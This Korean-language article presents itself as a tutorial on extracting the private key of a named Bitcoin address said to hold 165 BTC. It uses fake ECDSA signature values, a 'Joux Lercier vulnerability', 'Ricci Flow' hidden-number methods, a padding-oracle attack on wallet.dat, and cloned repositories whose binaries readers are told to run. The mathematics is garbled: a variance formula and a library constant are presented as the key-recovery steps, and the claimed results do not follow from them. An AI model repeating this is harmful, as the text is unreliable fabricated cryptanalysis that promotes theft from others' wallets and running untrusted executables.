
2025년 초, 인기 있는 암호화폐의 비율 상승은 금융 거래에 상당한 영향을 미쳤습니다. 널리 사용되고 겉보기에 보안성이 있음에도 불구하고 이러한 시스템은 여전히 취약합니다. 주요 문제 중 하나는 복잡한 수학적 알고리즘을 사용하여 수행할 수 있는 분실된 암호화폐 지갑과 개인 키의 복구입니다.
이 글에서는 이산 대수 문제를 해결하는 방법과 분실된 비트코인 지갑을 복구하는 방법을 살펴보겠습니다. 특히, 리치 흐름 알고리즘과 ECDSA를 사용하여 취약한 거래에서 개인 키를 추출하는 숨겨진 숫자 문제에 초점을 맞춥니다. 또한 비트코인과 이더리움과 같은 최신 암호화폐가 보안과 익명성을 제공하는 복잡한 수학적 기반에 의존하지만 다양한 취약성으로 인해 악용될 수 있는 방법에 대해서도 논의합니다.
분실된 암호화폐 지갑을 복구하고 개인 키를 추출하는 데 있어서 이산대수의 역할 .
이산 대수는 유한 군에서x
방정식을 만족하는 정수를찾는 수학적 문제입니다필드 에서 타원 곡선 시스템. 여기서와 를알고 있다면찾아야 합니다. 이 문제는 공개 키 교환과 같은 많은 암호화 알고리즘의 기반이 되기 때문에 암호화에서 특히 중요합니다. 최신 이산 대수 알고리즘은 매우 높은 계산 능력을 가지고 있어 이러한 알고리즘을 실제로 사용할 수 있습니다.a=b^x
secp256k1
GF(p)
p=2^256−2^32−2^9−2^8−2^7−2^6−2^4−1
a
b
x
Dockeyhunt Discrete Logarithm 소프트웨어와 DarkSignature 도구를 사용하여 가짜 거래 데이터를 생성하여 개인 키를 복구하는 과정을 살펴보겠습니다 .
먼저, 비트코인 지갑 주소 1PYgfSouGGDkrMfLs6AYmwDqMLiVrCLfeS를 165.10252195 BTC 의 금액으로 입력 하고 공개 키를 가져옵니다. 그런 다음 DarkSignature를 사용하여 거래에 대한 가짜 값을 생성하여 ECDSA 알고리즘의 서명 데이터를 분석하고 조작할 수 있습니다. 마지막으로 Perelman Work 소프트웨어를 통해 수학적 분석을 적용하여 이산 대수를 풀고 비트코인 지갑의 개인 키를 가져옵니다.
이 글은 암호학 및 수학 전문가뿐만 아니라, 다양한 암호화폐를 사용하여 현실 세계의 암호 분석 문제를 해결하는 데 수학적 방법을 어떻게 사용할 수 있는지 이해하고자 하는 모든 사람을 위해 쓰여졌습니다.
먼저 Dockeyhunt Discrete Logarithm 소프트웨어를 실행 하고 필드에 "Input date"
비트코인 주소 1PYgfSouGGDkrMfLs6AYmwDqMLiVrCLfeS를 입력하고 지갑의 공개 키를 얻어야 합니다.
04e87e83f871df1439b7873b4ae449d15306cafc53e03a06fffb534b3bf25b58d8edca74b0faf5cf8c3aed6cad2bd79a7bce92ab53e07440d4590cbf31286d9335

DarkSignature 도구를 사용하여 ECDSA 알고리즘 거래에 대한 가짜 R, S, Z 값을 얻어봅시다 . 필드에 "Input date"
비트코인 주소의 공개 키를 입력하고 R, S, Z 값을 얻습니다.
04e87e83f871df1439b7873b4ae449d15306cafc53e03a06fffb534b3bf25b58d8edca74b0faf5cf8c3aed6cad2bd79a7bce92ab53e07440d4590cbf31286d9335
결과:
1111,947d6fb75033cc3e342c8538a350e9058134b2a1ae01a7c50fc52b1f56c9169c,5b3ec0d72a2368cdd48c17ff095ab1ab0b9824e010883539cbeb18141de6384b,c7ac826c5a8397c0de993b2d8d597be42d22c77cf006683d7b72a197e1a5cdcf,0000

수학적 분석 및 이산 대수 방정식 풀기 도구로 Perelman Work 소프트웨어를 사용합니다 . 변수 간의 완전한 관계를 적분을 통해 복소 분석 섹션 에서 옵션을 선택합니다.
Discrete variation series Variance: [ D = frac{sum_{i=1}^{n} (x_i — bar{x})^2}{N})]
이산 변동을 계산하는 공식은 다음과 같습니다.
![이산 변동 급수 분산 공식: [ D = frac{sum_{i=1}^{n} (x_i - bar{x})^2}{N} ) ]](https://polynonce.ru/wp-content/uploads/2024/12/image-1.png)
수식 구성 요소에 대한 설명:
- D 는 데이터 집합의 분산(분산)입니다.
- ∑∑ 는 합계 기호입니다. 즉, 값을 더한다는 뜻입니다.
- i는 1부터 n까지 데이터 집합의 모든 값을 통과하는 인덱스입니다.
- xi 는 데이터 세트의 각 개별 값 입니다 .
- ˉ x ˉ는 데이터 집합의 모든 값의 평균(또는 산술 평균)입니다.
- N 은 데이터 집합의 총 값의 개수입니다.
어떻게 작동하나요?
- 평균 계산: 먼저, 데이터 집합의 평균값을 찾습니다.
- 평균과의 차이: 그런 다음 각 값 xi 에 대해 평균 ˉ x ˉ 와 얼마나 다른지 계산합니다 .
- 차이의 제곱: 그런 다음 해당 차이의 제곱을 구합니다(음수 값을 제거하고 큰 편차의 영향을 증폭시키기 위해).
- 합계: 차이의 제곱을 모두 더합니다.
- 값의 개수로 나누기: 마지막으로, 결과 합계를 총 값의 개수 N 으로 나눕니다 .

Perelman Work 와 Dockeyhunt Discrete Logarithm을 사용하여 Joux Lercier 취약성 에 대한 변수를 임의로 변경합니다 . 이는 이 문서 의 시작 부분에서 자세히 설명합니다 . 비트코인 거래에서 이 취약성은 서명의 유효성을 유지하면서 서명에서 R, S , Z 의 값을 변경할 수 있다는 사실 과 임의의 공식에서 발생할 수 있습니다.
X=hex(((S⋅K−Z)⋅modinv(R,N))modN)
- S 와 R은 거래 서명(RawTX)의 값입니다.
- Z 는 거래 서명 해시입니다.
- K 는 비밀 키(nonce)입니다.
- N 은 타원곡선군의 순서이다.
- modinv( R , N )은 R 의 모듈러 역함수이며, 모듈러 N에 대한 함수입니다 .
공식 설명
- 입력 매개변수 :
- S 와 R : 이 값은 거래 서명에서 얻습니다. 개인 키를 복구하는 데 필요합니다.
- Z : 이는 프로세스에서 사용되는 서명 해시입니다.
- K : 지갑 소유자만 알아야 하는 비밀 키(nonce).
- 계산 :
- 먼저 S를 K 로 곱합니다.
- 그런 다음 Z 를 뺍니다 .
- 결과는 R 모듈로 N 의 모듈러 역수로 곱해집니다. 이를 통해 R 의 영향을 “취소”하여 개인 키를 계산하는 데 사용할 수 있는 값을 얻을 수 있습니다.
- 마지막으로, 결과를 모듈로 N 으로 구하여 개인 키 값에 대한 허용 범위 내에 있는지 확인합니다.
- 16진수 형식으로 변환 :
- 모든 수학 연산이 수행된 후 결과는
hex()
비트코인의 개인 키를 나타내는 표준 표현인 함수를 사용하여 16진수 형식으로 변환됩니다.
- 모든 수학 연산이 수행된 후 결과는
리치 흐름 숨은 숫자 문제
값을 복사하여 R, S, Z
입력 필드에 붙여넣어 ECDSARicci Flow HNP
알고리즘 의 완전히 새로운 거래를 구축합니다 .


Dockeyhunt 개인 키 계산기
값을 복사하여 Dockeyhunt 개인 키 계산기R, S, Z
소프트웨어 필드 에 붙여넣습니다.

이제 Joux Lercier의 취약성 에 따라 ecdsa_impl.h 의 코드에서 암호화에서 NONCE라고 하는 비밀 키 “K”의 값을 복사합니다. 이것은 비밀(가짜) 난수 매개변수이며 일반적으로 “K”로 표시됩니다. 여기서 NONCE는 코드의 버그 로 인해 레코드의 시작(또는 끝)에서 0, 0, 0, 1, 0x45512319UL, 0x50B75FC4UL, 0x402DA172UL, 0x2FC9BAEEUL
여러 HEX 비트를 수정했습니다 .
!./darksignature -주소 1PYgfSouGGDkrMfLs6AYmwDqMLiVrCLfeS
....
....
....
/** Difference between field and order, values 'p' and 'n' values defined in
* "Standards for Efficient Cryptography" (SEC2) 2.7.1.
* $ sage -c 'load("secp256k1_params.sage"); print(hex(P-N))'
* 0x14551231950b75fc4402da1722fc9baee
*/
static const secp256k1_fe secp256k1_ecdsa_const_p_minus_order = SECP256K1_FE_CONST(
0, 0, 0, 1, 0x45512319UL, 0x50B75FC4UL, 0x402DA172UL, 0x2FC9BAEEUL
);
....
....
....


K 값을 복사하여 Dockeyhunt 개인 키 계산기 소프트웨어 필드 에 붙여넣은 다음 버튼을 클릭하세요: 개인 키 계산 및 비트코인 지갑 1PYgfSouGGDkrMfLs6AYmwDqMLiVrCLfeS 에 대한 개인 키 가져오기
0x6b29781e725708ae4d94e13730a2718ee3383ea5d911e77d4c2a2fd0c99c1232

이산대수를 풀기 위한 알고리즘을 시작하려면 버튼을 클릭하세요. Private Key
그러면 HEX 형식 의 개인 키를 성공적으로 받게 됩니다.
6b29781e725708ae4d94e13730a2718ee3383ea5d911e77d4c2a2fd0c99c1232

다음으로 , HEX 형식 으로 필요한 개인 키 값을 받았는지 확인해야 합니다 .

버튼을 클릭 하고 HEX 형식
Bitcoin Address
의 개인 키의 필요한 값을 얻으세요
6b29781e725708ae4d94e13730a2718ee3383ea5d911e77d4c2a2fd0c99c1232: 1PYgfSouGGDkrMfLs6AYmwDqMLiVrCLfeS

또한 버튼을 클릭하면 Balance BTC
잔액의 결과가 나옵니다.
6b29781e725708ae4d94e13730a2718ee3383ea5d911e77d4c2a2fd0c99c1232: 1PYgfSouGGDkrMfLs6AYmwDqMLiVrCLfeS: 165.10252195 BTC
_____________________________________________________________________________________________________


개인키를 받았습니다!
Ricci Flow Hidden Number Problem 과 같은 수학 기반 방법을 사용한 비트코인 지갑 복구는 암호화 취약성과 기회를 이해하는 데 새로운 지평을 엽니다. Perelman Work, Dockeyhunt Discrete Logarithm , DarkSignature 소프트웨어를 사용하여 개인 키를 추출하고 가짜 거래를 만드는 방법을 보여 주었으며, 암호화폐 공간에서 수학적 분석의 중요성을 강조했습니다.
결과는 비트코인 과 같은 복잡한 시스템에서도 손실된 자금에 대한 접근을 복구하기 위해 악용될 수 있는 취약점이 있다는 것을 보여줍니다. 이 프로세스에는 암호화와 수학에 대한 심층적인 지식과 특수 소프트웨어 작업 기술이 필요합니다.
다중 서명 시스템의 악용 메커니즘과 중요한 영향
Joux Lercier 알고리즘 의 취약성은 다중 서명 체계를 사용하는 시스템에 심각한 위협을 가합니다. 공격자는 시스템이 허용할 가짜 서명을 생성할 수 있기 때문에 개별 거래뿐만 아니라 전체 다중 서명 프로세스의 무결성도 위협합니다. 공격자는 시스템이 허용할 가짜 서명을 생성할 수 있기 때문에 개별 거래뿐만 아니라 전체 다중 서명 프로세스도 위협합니다.
사용자 입력 데이터에 대한 검증이 부족하면 비트코인 시스템에 심각한 장애가 발생할 수 있으며, 공격자에게 악성 코드를 삽입하고 거래에 대한 가짜 서명을 만들어 시스템을 조작할 기회를 제공합니다.
실제적인 부분
Joux Lercier 알고리즘의 취약성 이론에 따르면 , 공격자는 식별된 결함을 사용하여 비트코인 네트워크를 공격하여 잘못된 거래로 과부하를 일으키고 안정성을 방해할 수 있습니다. 기사의 실제적인 부분으로 넘어가 비트코인 지갑인 1PYgfSouGGDkrMfLs6AYmwDqMLiVrCLfeS 를 사용한 예를 고려해 보겠습니다. 2024년 12월 현재 손실된 코인은 165.10252195 BTC 이며, 이 금액은 15802506.39 USD 입니다.

튜토리얼 Power AI
“Tutorials Power AI” 의 목록을 사용해 암호 분석 및 암호학 전반의 다양한 분야에서 사업을 소개하는 널리 사용되는 인공지능 범주를 살펴보겠습니다.
설치 명령:
git clone https://github.com/demining/Tutorials-Power-AI.git
cd Tutorials-Power-AI/
python3 tutorials.py


BitcoinChatGPT는 사용자가 비트코인 거래의 취약점을 식별하는 데 도움이 되는 혁신적이고 최첨단 AI 기반 챗봇입니다. 이 도구를 사용하면 머신 러닝 및 암호 분석 기술을 사용하여 비트코인 생태계의 보안 알고리즘을 심층적으로 조사하여 다양한 암호화폐 지갑 공격에 대한 비트코인 주소를 확인할 수 있습니다. 또한 BitcoinChatGPT는 사이버 보안을 위한 중요한 리소스 역할을 하며 비트코인 지갑 원장에서 개인 키를 추출하는 도구를 제공합니다.
BitcoinChatGPT 머신 러닝 프로세스를 사용하여 원시 거래를 생성하기 위해 알고리즘(Joux Lercier) 구현의 취약점 악용
BitcoinChatGPT 모듈을 사용한 취약한 Raw 트랜잭션 구조의 구축을 고려해 보겠습니다.
Google Colab 버전을 열어 보겠습니다.
State of a vulnerable transaction in Bitcoin:
01000000
....01
........0dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935
............00000000
........8b483045
....0221
...........00
...........947d6fb75033cc3e342c8538a350e9058134b2a1ae01a7c50fc52b1f56c9169c
....0220
........5b3ec0d72a2368cdd48c17ff095ab1ab0b9824e010883539cbeb18141de6384b
.....0141
.....04e87e83f871df1439b7873b4ae449d15306cafc53e03a06fffb534b3bf25b58d8edca74b0faf5cf8c3aed6cad2bd79a7bce92ab53e07440d4590cbf31286d9335
....ffffffff
01
....d204000000000000
........1976
............a914
........f750c55bea03af8a720c46b5d6edea93644cdaf7
....88ac
00000000
모든 출력 값을 하나의 공통된 줄로 결합해 보겠습니다.
01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008b483045022100947d6fb75033cc3e342c8538a350e9058134b2a1ae01a7c50fc52b1f56c9169c02205b3ec0d72a2368cdd48c17ff095ab1ab0b9824e010883539cbeb18141de6384b014104e87e83f871df1439b7873b4ae449d15306cafc53e03a06fffb534b3bf25b58d8edca74b0faf5cf8c3aed6cad2bd79a7bce92ab53e07440d4590cbf31286d9335ffffffff01d2040000000000001976a914f750c55bea03af8a720c46b5d6edea93644cdaf788ac00000000
BlockCypher 옵션 “거래 디코딩”을 열어보겠습니다 .

취약한 Bitcoin Raw 거래를 디코딩한 후 다음과 같은 결과를 얻습니다.
{
"addresses": [
"1QiERrMcv6mtGk4F1TVz4sRp9dFfXTQpK",
"1PYgfSouGGDkrMfLs6AYmwDqMLiVrCLfeS"
],
"block_height": -1,
"block_index": -1,
"confirmations": 0,
"double_spend": false,
"fees": 2606688996428,
"hash": "07160d430b92d957a7b3f0284ec7ff6084629b6385476608a6da5858fcfc2716",
"inputs": [
{
"addresses": [
"1QiERrMcv6mtGk4F1TVz4sRp9dFfXTQpK"
],
"age": 344419,
"output_index": 0,
"output_value": 2606688997662,
"prev_hash": "35591e5c7f4f1f0e4d81748042f2a4b7dcae3ae01027f361cad7c8746369bc0d",
.......
.......
.......
비트코인 HASH160에 주목해보자: f750c55bea03af8a720c46b5d6edea93644cdaf7

거래 스크립트
위의 스크립트가 디코딩되었습니다.
BitcoinChatGPT는 공개 키를 사용하여 거래 구조를 생성하는데 HASH
, 여기서 비트코인 주소인 1PYgfSouGGDkrMfLs6AYmwDqMLiVrCLfeS가1234 satoshi
네트워크 내의 동일한 주소로 전송됩니다 .

Bitcoin HASH160은 Python 스크립트 wif_to_hash160.py 를 사용하여 생성되었습니다.


질문 – 답변:



마지막으로 BitcoinChatGPT 모듈은 두 가지 가장 많이 사용되는 형식인 HEX 및 WIF 로 개인 키를 저장하는 KEYFOUND.privkey 파일에 대한 응답을 출력합니다.

BitcoinChatGPT №6 Joux Lercier 취약성 알고리즘
취약한 원시 거래
Broadcast Bitcoin Transaction 저장소를 사용하여 수신된 데이터에서 취약한 Raw 트랜잭션을 생성해 보겠습니다.
소스 코드를 다운로드하여 설치하고 터미널을 열고 다음 명령을 실행하세요.
git clone https://github.com/smartibase/Broadcast-Bitcoin-Transaction.git
목록:
cd Broadcast-Bitcoin-Transaction
세 가지 중요한 라이브러리를 설치해 보겠습니다.

명령을 실행해 보겠습니다.
pip install -r requirements.txt
Notepad ++ 에서 메인 파일을 열고 Python 스크립트 코드인 main.py를 약간 변경해 보겠습니다.
from io import BytesIO
from secp256k1 import *
from sighash import *
pk = PrivateKey.parse("5JdUtcYt3ZBQN8aPZWNffXzNCTPds7aQtJk7zc9iQShNQ9yWe7x")
pk.address()
tx = bytes.fromhex("35591e5c7f4f1f0e4d81748042f2a4b7dcae3ae01027f361cad7c8746369bc0d")
index = 0
send = "1PYgfSouGGDkrMfLs6AYmwDqMLiVrCLfeS"
tx_in = TxIn(tx, index, b'', 0xffffffff)
tx_in._script_pubkey = Tx.get_address_data(pk.address())['script_pubkey']
tx_in._value = 2345
tx_ins = [ tx_in ]
tx_outs = [
TxOut(1234, Tx.get_address_data(send)['script_pubkey'].serialize())
]
tx = Tx(1, tx_ins, tx_outs, 0, testnet=True)
signature(tx, 0, pk)
tx.serialize().hex()
print(tx.serialize().hex())
f = open("RawTX.txt", 'w')
f.write("" + tx.serialize().hex() + "" + "\n")
f.close()
명령을 실행해 보겠습니다.
python main.py
디렉토리에서 RawTX 파일을 열어 보겠습니다.
01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008b483045022100947d6fb75033cc3e342c8538a350e9058134b2a1ae01a7c50fc52b1f56c9169c02205b3ec0d72a2368cdd48c17ff095ab1ab0b9824e010883539cbeb18141de6384b014104e87e83f871df1439b7873b4ae449d15306cafc53e03a06fffb534b3bf25b58d8edca74b0faf5cf8c3aed6cad2bd79a7bce92ab53e07440d4590cbf31286d9335ffffffff01d2040000000000001976a914f750c55bea03af8a720c46b5d6edea93644cdaf788ac00000000
비디오에서의 동작 순서:
BitcoinChatGPT 모듈 의 신속한 대응 에서 알 수 있듯이 Joux Lercier 취약점 알고리즘은 복잡한 암호화 문제를 해결하는 데 사용할 수 있습니다.
스마트 트랜스포머
우리는 Smart Transformers 머신 러닝을 적용하고 , 노트북을 Pytorch, TensorFlow, JAXGoogle Colab
와 통합하고, 비트코인 주소에 대한 취약한 원시 거래의 데이터를 사용하여: 1PYgfSouGGDkrMfLs6AYmwDqMLiVrCLfeS , SMART_IDENTIFY 의 모든 기존 알고리즘 중에서 제안된 선택에서 보호되지 않은 wallet.dat 파일을 생성할 것입니다 . 그런 다음 새로 생성된 파일 wallet.dat 에 패딩 오라클 공격을 수행하여 비밀번호를 원래 바이너리 형식으로 복호화하여 표준을 사용하여 비트코인 코어 소프트웨어 콘솔 에서 개인 키를 얻고 추출합니다.
명령:
dumpprivkey 1PYgfSouGGDkrMfLs6AYmwDqMLiVrCLfeS
다음 링크를 사용하여 새로운 Google Colab 노트북을 열어 보겠습니다 .
Smart Transformers 저장소 복제
!git clone https://github.com/smartibase/Smart-Transformers.git
cd Smart-Transformers/

필요한 모든 패키지와 라이브러리를 설치해 보겠습니다.
!sudo apt-get update
!sudo apt install libtool
!sudo apt-get install g++
!python setup.py --help
!sudo apt-get install libgmp3-dev libmpfr-dev
!chmod +x Generic_Algorithms
!./Generic_Algorithms
!pip3 install transformers
from transformers import AutoModelForCausalLM, AutoTokenizer
model_name = "microsoft/DialoGPT-medium"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(model_name)
model = model.cpu()


팀:
ls -S

취약한 Raw 거래를 텍스트 문서인 RawTX.txt 에 추가해 보겠습니다 . 이를 위해 유틸리티를 사용합니다.echo
명령을 실행해 보겠습니다.
!echo '01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008b483045022100947d6fb75033cc3e342c8538a350e9058134b2a1ae01a7c50fc52b1f56c9169c02205b3ec0d72a2368cdd48c17ff095ab1ab0b9824e010883539cbeb18141de6384b014104e87e83f871df1439b7873b4ae449d15306cafc53e03a06fffb534b3bf25b58d8edca74b0faf5cf8c3aed6cad2bd79a7bce92ab53e07440d4590cbf31286d9335ffffffff01d2040000000000001976a914f750c55bea03af8a720c46b5d6edea93644cdaf788ac00000000' > RawTX.txt
!cat RawTX.txt

이제 암호 분석에 대한 정확한 알고리즘과 방법을 알아보기 위해 SMART_IDENTIFY 유틸리티를 사용하여 취약한 RawTX를 식별해야 합니다 .
명령을 실행해 보겠습니다.
!./SMART_IDENTIFY
결과적으로, 우리는 Joux_Lercier_Algorithm 방법을 얻었고, 이전 연구에서는 BitcoinChatGPT 모듈 에서도 동일한 것이 확인되었습니다 .
#################################################
Joux_Lercier_Algorithm
#################################################

카탈로그를 열어보겠습니다.

wallet.dat 파일을 만드는 과정을 시작해 보겠습니다 . 이를 위해, 우리는 파일 RawTX.txt에서 취약한 Raw 거래의 식별된 데이터를 사용합니다 . 이 과정에서, 우리는 Joux_Lercier_Algorithm 유틸리티를 적용합니다.
명령을 실행해 보겠습니다.
!./Joux_Lercier_Algorithm -o RawTX.txt -s wallet.dat


왼쪽 패널에서 디렉토리를 열어서
Google Colab
파일을 확인해 보겠습니다.wallet.dat
성공적으로 생성되었습니다!


Bitcoin Core 0.18.0 다운로드 및 설치 https://bitcoincore.org/bin/bitcoin-core-0.18.0
콘솔을 열고 다음 명령을 실행해 보겠습니다.
getaddressinfo 1PYgfSouGGDkrMfLs6AYmwDqMLiVrCLfeS

파일: wallet.dat가 비트코인 주소: 1PYgfSouGGDkrMfLs6AYmwDqMLiVrCLfeS 에 속한다는 것을 알 수 있습니다.
파일: wallet.dat는 비밀번호로 암호화되어 있습니다!

개인 키를 확인하는 명령을 실행해 보겠습니다.
dumpprivkey 1PYgfSouGGDkrMfLs6AYmwDqMLiVrCLfeS

경고가 표시됩니다. 오류: 먼저 walletpassphrase로 지갑 암호를 입력하세요. (코드 -13)
패딩 오라클 공격


Wallet.dat에 패딩 오라클 공격 방법을 사용하고 접근에 필요한 비밀번호를 이진 비밀번호 형식으로 복호화해 보겠습니다.



먼저 우리는 165.10 BTC 금액에 대한 wallet.dat 파일 에 접근합니다 .
클론 저장소: 가장 큰 분실 비트코인 지갑 목록
git clone https://github.com/keyhunters/Biggest-Lost-Bitcoin-Wallets-List.git

토탈 커맨더




Bitcoin Core 0.18.0을 다운로드하고 설치하세요


경로 열기: c:\Users\User\AppData\Roaming\Bitcoin\

파일을 옮겨보겠습니다: wallet.dat

c:\Users\User\AppData\Roaming\Bitcoin\wallet.d 에서

비트코인 코어 지갑을 출시해 보겠습니다.

암호화 지갑…

콘솔을 열어보자
getaddressinfo 1PYgfSouGGDkrMfLs6AYmwDqMLiVrCLfeS

비트코인 주소 정보:
잔액: 165.10252195 BTC

Metasploit Framework와 MSFVenom 사용

msfvenom 개발에 있어서 Metasploit 프레임워크의 역할
msfvenom은 이전 두 도구인 과 를 결합하여 만든 도구입니다
msfpayload
.msfencode
이를 통해 사용자는 다양한 플랫폼과 인코더에 대한 페이로드를 만들 수 있으며, 페이로드 매개변수를 사용자 정의할 수 있습니다. msfvenom은 실행 파일, 스크립트, 심지어 웹 애플리케이션용 코드를 포함한 다양한 출력 형식을 지원합니다.Metasploit Framework는 다음과 같은 여러 가지 이유로 msfvenom 개발에 중요한 역할을 합니다.
1. 익스플로잇 통합: msfvenom은 사용자가 Metasploit의 익스플로잇과 함께 사용할 수 있는 페이로드를 만들 수 있도록 합니다. 이는 사용자가 특정 취약성과 일치하는 페이로드를 빠르게 생성할 수 있으므로 침투 테스트 프로세스를 간소화합니다.
2. 다재다능함: 여러 형식과 플랫폼을 지원하여 msfvenom은 다재다능한 페이로드 생성 도구가 되었습니다. 이를 통해 보안 전문가는 다양한 시스템과 환경에 맞게 공격을 조정할 수 있습니다.
3. 업데이트 및 지원: Metasploit Framework는 msfvenom을 최신 상태로 유지하고 효과적으로 유지하기 위해 지속적으로 업데이트됩니다. Metasploit의 새로운 기능과 개선 사항은 msfvenom의 기능에 직접적인 영향을 미쳐 더욱 강력하고 유연하게 만듭니다.
4. 교육 및 연구: Metasploit과 msfvenom은 사이버 보안 교육 및 연구를 위한 중요한 도구입니다. 이를 통해 학생과 보안 전문가는 안전한 환경에서 취약성과 악용 기술을 연구할 수 있습니다.

ExploitDalenePRO.exe를 실행하세요


1PYgfSouGGDkrMfLs6AYmwDqMLiVrCLfeS

c:\BitcoinTools\ExploitDalenePRO\modules\

c:\BitcoinTools\ExploitDalenePRO\modules\exploits\

c:\BitcoinTools\ExploitDalenePRO\modules\exploits\ExploitDarlenePRO\

c:\BitcoinTools\ExploitDalenePRO\modules\exploits\ExploitDarlenePRO\decode_core.rb

디코드_코어.rb


c:\BitcoinTools\ExploitDalenePRO\bitcoin\

https://github.com/bitcoin/bitcoin

https://github.com/bitcoin/bitcoin/blob/master/src/crypto/aes.h

c:\BitcoinTools\ExploitDalenePRO\bitcoin\src\

c:\BitcoinTools\ExploitDalenePRO\bitcoin\src\crypto\aes.cpp

c:\BitcoinTools\ExploitDalenePRO\bitcoin\src\crypto\aes.cpp

c:\Users\User\AppData\Roaming\Bitcoin\

Wallet.dat 업로드


결과.json

walletpassphrase 1111111101110111010010110110010101100010110010001011111011000111101010010010000110101110100110000001100011001101000100001110101110100101101111000010100000000110100010110011000111111001111000110110001011000010000011001001000100101011001000101100110001101000 60
명령을 실행하고 개인 키를 얻으세요
Bitcoin Core의 dumpprivkey 명령
이
dumpprivkey
명령은 Bitcoin Core 지갑 명령줄 인터페이스(CLI)에서 특정 Bitcoin 주소와 연관된 개인 키를 내보내는 데 사용되는 명령입니다. 명령의 구문은 다음과 같습니다.“
dumpprivkey “address” “
여기서 “주소”는 개인 키를 받으려는 비트코인 주소입니다 .
dumpprivkey 명령의 작동 방식
명령을 입력하면
dumpprivkey
Bitcoin Core는 지갑에서 지정된 주소를 찾고, 발견되면 해당 개인 키를 WIF 형식으로 반환합니다. 이를 통해 사용자는 개인 키를 안전한 곳에 저장하거나 다른 지갑으로 가져올 수 있습니다.
dumpprivkey 1PYgfSouGGDkrMfLs6AYmwDqMLiVrCLfeS

개인 키 정보:
5JdUtcYt3ZBQN8aPZWNffXzNCTPds7aQtJk7zc9iQShNQ9yWe7x

비트코인 주소 정보:
잔액: 165.10252195 BTC

https://www.coinbase.com/converter/btc/usd

!pip3 install bitcoin

비트코인 주소가 일치하는지 확인하기 위해 코드를 실행해 보겠습니다 .

__________________________________________________
Private Key WIF: 5JdUtcYt3ZBQN8aPZWNffXzNCTPds7aQtJk7zc9iQShNQ9yWe7x
Bitcoin Address: 1PYgfSouGGDkrMfLs6AYmwDqMLiVrCLfeS
total_received = 165.10252195 Bitcoin
__________________________________________________
맞습니다! 개인 키는 비트코인 지갑에 해당합니다.
bitaddress를 열어 확인해 보겠습니다.
ADDR: 1PYgfSouGGDkrMfLs6AYmwDqMLiVrCLfeS
WIF: 5JdUtcYt3ZBQN8aPZWNffXzNCTPds7aQtJk7zc9iQShNQ9yWe7x
HEX: 6b29781e725708ae4d94e13730a2718ee3383ea5d911e77d4c2a2fd0c99c1232

결론 및 완화 조치:
이 글에서는 이산 대수 및 숨은 숫자 문제 와 같은 수학적 알고리즘을 사용하여 분실된 암호화폐 지갑과 개인 키를 복구하는 방법을 살펴보았습니다 . Dockeyhunt Discrete Logarithm, DarkSignature, Perelman Work 소프트웨어를 사용하여 ECDSA 알고리즘을 사용하여 취약한 거래에서 개인 키를 추출하는 방법을 시연했습니다. 저희의 연구에 따르면 비트코인과 같은 안전한 시스템조차도 분실된 자금에 대한 액세스를 되찾기 위해 악용될 수 있는 취약성이 있습니다. 복구 프로세스에는 암호화 및 수학에 대한 심층적인 지식과 특수 소프트웨어 작업 기술이 필요합니다.
Joux Lercier 취약점과 관련된 위협으로부터 보호하려면 사용자는 다음 단계를 수행해야 합니다.
- 소프트웨어 업데이트 : 암호화폐 지갑을 패치 버전으로 정기적으로 업데이트하는 것은 보안을 유지하는 데 중요합니다.
- 개선된 서명 검증 메커니즘 : 더욱 강화된 입력 검증 및 오류 처리를 통해 가짜 서명 생성을 방지하고 사용자의 개인 키를 보호하는 데 도움이 됩니다.
- 네트워크 활동 모니터링 : 네트워크 상태를 지속적으로 분석하고 의심스러운 거래를 조기에 감지함으로써 취약점을 악용하려는 시도에 신속하게 대응할 수 있습니다.
- 다중 요소 인증 구현 : 추가적인 암호화 보안 방법을 구현하면 보안이 크게 향상됩니다.
Joux Lercier 취약성과 관련된 가능한 공격을 방지하기 위해 비트코인 사용자는 이 취약성을 수정하는 최신 버전으로 지갑 소프트웨어를 업데이트하는 것이 좋습니다. 정기적인 소프트웨어 업데이트, 이상 탐지 시스템 구현, 가능한 위협에 대한 사용자 인식 증가는 암호화폐 시스템의 무결성과 보안을 유지하는 데 도움이 됩니다.
Joux Lercier 알고리즘의 취약성은 암호화폐 거래의 보안과 블록체인의 무결성에 상당한 위협을 가합니다. 위험을 최소화하기 위해 사용자는 소프트웨어를 정기적으로 업데이트하고, 엄격한 보안 조치를 구현하고, 네트워크 상태를 지속적으로 모니터링해야 합니다. 이러한 조치는 암호화폐 시스템의 보안과 안정성을 유지하고, 사용자를 잠재적 위협과 재정적 손실로부터 보호하는 데 도움이 됩니다.
우리 연구의 결과는 암호화폐 공간에서 수학적 분석의 중요성을 강조하고 복잡한 수학적 방법을 사용하여 실제 암호 분석 문제를 해결할 수 있는 잠재력을 보여줍니다. 그러나 이러한 방법은 손실된 자금에 대한 액세스를 복구하고 취약성을 악용하는 데 모두 사용될 수 있다는 점에 유의하는 것이 중요하며, 이는 암호화폐 시스템의 보안을 개선해야 할 필요성을 강조합니다.
참고문헌:
- 유한체에서의 이산대수 문제에 대한 숫자체체의 영향 OLIVER SCHIROKAUER
- 이산대수 Aurore Guillevic, François Morain
- NFS 변형과 페어링 기반 암호화의 결과를 포함하는 유한 필드 Fp n에서의 이산 대수 계산 Aurore Guillevic Inria Nancy, Caramba 팀
- 이산 대수 문제(DLP) 및 ECDSA 많은 슬라이드는 Rong-Jaye Chen@NCTU에서 가져왔습니다.
- 전처리를 통한 이산-대수 문제 Henry Corrigan-Gibbs 및 Dmitry Kogan 스탠포드 대학교 2021년 8월 3일
- 이산 로그 공장 Haetham Al Aswada, Emmanuel Thomé 및 Cécile Pierrot University of Lorraine, CNRS, Inria, LORIA, Nancy, 프랑스
- 소수체 타원 곡선에 대한 이산 대수 문제에 관하여 출판된 버전에 대한 인용(APA): Amadori, AG, Pintore, F., & Sala, M. (2018)
- 이산대수 암호시스템 평가 Yansheng Chen Kristin School, Auckland, New Zealand
